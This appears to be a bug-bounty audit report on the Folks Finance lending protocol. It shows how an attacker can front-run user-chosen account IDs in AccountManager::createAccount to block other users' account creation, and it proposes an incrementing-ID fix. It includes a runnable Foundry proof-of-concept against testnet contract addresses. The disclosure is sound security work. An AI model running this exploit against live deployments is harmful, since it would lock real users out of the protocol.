Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)
An account is required to perform any core operations in the folks finance protocol. It is the user's responsibility to choose their accountId that will be created. A bad actor can front-run any account creation operation on the Hub chain and create an account using the accountId seen in any user's tx. Therefore, the bad actor is able to grief the account creation of any other user, preventing them from being able to interact with the protocol for an arbitrary amount of time.
Bug Description
Ignoring cross-chain components, the execution flow for account creation is as follows: SpokeCommon::createAccount -> router/adapter/hub interactions -> AccountManager::createAccount. It is important to note that all the account state is stored on the Hub chain, so the AccountManager contract on the Hub chain will store the account information for all users, even if the user is interacting via a different Spoke chain.
When creating an account, a user must supply an accountId that will be the identifier for the account to be created:
35:functioncreateAccount(36: bytes32 accountId,37: uint16 chainId,38: bytes32 addr,39: bytes32 refAccountId40: ) externaloverrideonlyRole(HUB_ROLE) {41:// check account is not already created (empty is reserved for admin)42:if (isAccountCreated(accountId) || accountId ==bytes32(0)) revertAccountAlreadyCreated(accountId); // @audit: accountId should not be created already43:44:// check address is not already registered45:if (isAddressRegistered(chainId, addr)) revertAddressPreviouslyRegistered(chainId, addr);46:47:// check referrer is well defined48:if (!(isAccountCreated(refAccountId) || refAccountId ==bytes32(0)))49:revertInvalidReferrerAccount(refAccountId);50:51:// create account52: accounts[accountId] =true;
217:functionisAccountCreated(bytes32 accountId) publicviewoverridereturns (bool) {218:return accounts[accountId]; // @audit: value is true if already created219: }
Since this accountId value is user defined, any bad actor can front-run other users' createAccount transactions and create accounts using those users' accountIds. This will result in the users' transactions reverting on line 42 in AccountManager.sol.
A bad actor can consistently grief other users' createAccount transactions, preventing those users from interacting with the core components of the protocol for an arbitrary amount of time. The bad actor can lower the gas costs of this exploit by submitting their createAccount tx directly via the Hub chain (utilizing the HubAdapter) instead of interacting via a Spoke chain (triggering cross chain communications).
Recommended Mitigation
I would recommend implementing an accountId state variable that is utilized and incremented every time a new account is created. This would be more gas intensive, but would limit the number of arbitrary values that users can supply to functions, which will in turn decrease the number of possible attack vectors.
Proof of concept
Proof of Concept
To run foundry POC:
add test file to test/ directory of a foundry repo
add AVAX_FUJI_RPC_URL variable as environment var or in .env file
run test with forge test --mc FolksPOC_GriefAccountCreation
// SPDX-License-Identifier: UNLICENSEDpragmasolidity ^0.8.13;import {Test, console} from"forge-std/Test.sol";interface IHUB {functionaccountManager() externalviewreturns (address);}interface IAccountManager {functionisAccountCreated(bytes32 accountId) externalviewreturns (bool);functionisAddressRegisteredToAccount(bytes32 account,uint16 chainId,bytes32 addr) externalviewreturns (bool);}interface ISpoke {structMessageParams {uint16 adapterId; uint16 returnAdapterId; uint256 receiverValue; uint256 gasLimit; uint256 returnGasLimit; }functioncreateAccount(MessageParamsmemory params,bytes32 accountId,bytes32 refAccountId) externalpayable;functioncreateLoan(MessageParamsmemory params,bytes32 accountId,bytes32 loanId,uint16 loanTypeId,bytes32 loanName) externalpayable;}interface ILoanManager {functionisUserLoanActive(bytes32 loanId) externalviewreturns (bool);}interface IHubAdapter {functionsequence() externalviewreturns (uint256);}contractFolksPOC_GriefAccountCreationisTest {uint256 avaxTestnetFork;string AVAX_FUJI_RPC_URL = vm.envString("AVAX_FUJI_RPC_URL");addressconstant HUB =0xaE4C62510F4d930a5C8796dbfB8C4Bc7b9B62140;addressconstant HUB_ADAPTER =0xf472ab58969709De9FfEFaeFFd24F9e90cf8DbF9;addressconstant SPOKE_COMMON =0x6628cE08b54e9C8358bE94f716D93AdDcca45b00;eventMessageFailed(uint16 adapterId, bytes32indexed messageId, bytes reason);errorAccountAlreadyCreated(bytes32 accountId);functionsetUp() public { avaxTestnetFork = vm.createFork(AVAX_FUJI_RPC_URL); vm.selectFork(avaxTestnetFork); }functiontestGriefAccountCreation() public {// user addressaddress user =address(0x1234);// bad actor addressaddress badActor =address(0x69420);// user pre-computes their accountIdbytes32 userAccountId =keccak256(abi.encodePacked(user));// user's pre-computed accountId has not been created yetaddress accountManager =IHUB(HUB).accountManager();bool created =IAccountManager(accountManager).isAccountCreated(userAccountId);assertTrue(!created);// bad actor sees user's tx on Hub (part of cross-chain tx or directly on Hub chain) and front-runs tx using user's accountId ISpoke.MessageParams memory params = ISpoke.MessageParams({ adapterId:1, returnAdapterId:1, receiverValue:0, gasLimit:0, returnGasLimit:0 }); vm.prank(badActor);ISpoke(SPOKE_COMMON).createAccount(params, userAccountId,bytes32(0));// user's pre-computed accountId has been created by the bad actor first created =IAccountManager(accountManager).isAccountCreated(userAccountId);assertTrue(created);// user's account creation fails since accountId has been createdbytes32 messageId =keccak256(abi.encodePacked(bytes32("HUB_ADAPTER_V1"),IHubAdapter(HUB_ADAPTER).sequence()));bytesmemory reason = abi.encodeWithSelector(AccountAlreadyCreated.selector, userAccountId); // error message from failed operation vm.startPrank(user); vm.expectEmit(true,false,false,true);emitMessageFailed(params.adapterId, messageId, reason); ISpoke(SPOKE_COMMON).createAccount(params, userAccountId,bytes32(0)); vm.stopPrank(); }}